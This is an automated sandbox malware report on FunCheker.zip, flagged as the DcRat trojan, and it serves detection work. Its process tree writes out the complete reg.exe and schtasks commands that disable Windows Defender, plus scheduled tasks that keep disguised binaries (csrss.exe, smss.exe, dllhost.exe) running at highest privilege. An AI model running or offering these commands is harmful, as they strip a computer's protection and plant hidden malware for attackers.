Analysis Overview
SHA256
0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9
Threat Level: Known bad
The file FunCheker.zip was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Modifies Windows Defender Real-time Protection settings
Modifies security service
DcRat
DCRat payload
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-22 19:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-22 19:12
Reported
2024-07-22 19:30
Platform
win7-20240704-en
Max time kernel
1050s
Max time network
725s
Command Line
Signatures
DcRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Defender\es-ES\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Help\csrss.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\Help\886983d96e3d3e | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\L2Schemas\csrss.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\L2Schemas\886983d96e3d3e | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Default User\System.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\L2Schemas\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Help\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Help\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CbarT2SBYT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\syYKg8QxNI.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QRlBHoY6P9.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1F0LTC0kP2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fmTXnddwCX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b7oBPqXqtO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UucX7bnqC8.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FIx4sKIZfl.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EYKlAcFNfO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
